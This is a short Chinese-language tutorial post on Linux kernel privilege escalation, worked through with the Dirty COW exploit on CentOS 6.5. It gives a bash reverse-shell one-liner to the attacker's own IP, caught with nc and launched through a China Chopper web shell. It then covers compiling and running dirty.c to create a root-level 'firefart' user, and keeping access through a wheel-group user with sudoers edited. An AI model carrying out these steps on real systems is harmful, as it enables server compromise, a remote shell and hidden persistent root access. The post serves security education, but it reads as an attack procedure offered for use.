內網滲透之——linux本地漏洞提權之——溢出提權

利用系統內核提權漏洞基本思路

1.判斷系統版本
    uname -a   (Linux查看操作系統內核信息) 
    cat /proc/version (Linux查看當前操作系統版本信息) 
    cat /etc/issue  或cat /etc/redhat-release(Linux查看版本當前操作系統發行版信息)

2.根據內核版本去找對應的exp

3.獲取交互式shell(反彈端口)

bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1

4.交互式shell裏上傳exp並編譯
上傳路徑:/tmp(可讀可寫可執行目錄)

實例:利用centos6.5復現髒牛漏洞(CVE-2016-5195)

1.查看內核版本,符合髒牛使用條件>2.6.2

2.獲取交互式shell(反彈端口),菜刀虛擬終端輸入命令:bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1,nc輸入nc.exe -lvvp 端口進行監聽,之後會將shell彈出

3.用菜刀上傳exp(dirty.c)到tmp文件

4.在交互式shell裏使用gcc編譯此文件: 命令: gcc -pthread dirty.c -o dirty -lcrypt
如果目標服務器上沒有安裝gcc編譯軟件怎麼辦:可以另找一臺機器 (最好內核,操作系統版本和系統位數都和目標機一致)編譯,將編譯好的文件直接上傳

5.執行編譯後的dirty文件,命令:./dirty 123456
會生成一個firefart用戶代替root,密碼就是上面輸的123456

6.使用firefart用戶進行遠程登陸,就具有root權限了

7.之後創建一個用戶xxx,使用passwd更改密碼,將其添加到普通管理員組wheel,之後去掉etc/sudoers裏105行的#

8.此時使用xxx用戶登陸,也具有root權限,之後將自動備份的/tmp/passwd.bak內容還原到etc/passwd,即可恢復之前的root權限

 

發表評論
所有評論
還沒有人評論,想成為第一個評論的人麼? 請在上方評論欄輸入並且點擊發布.
相關文章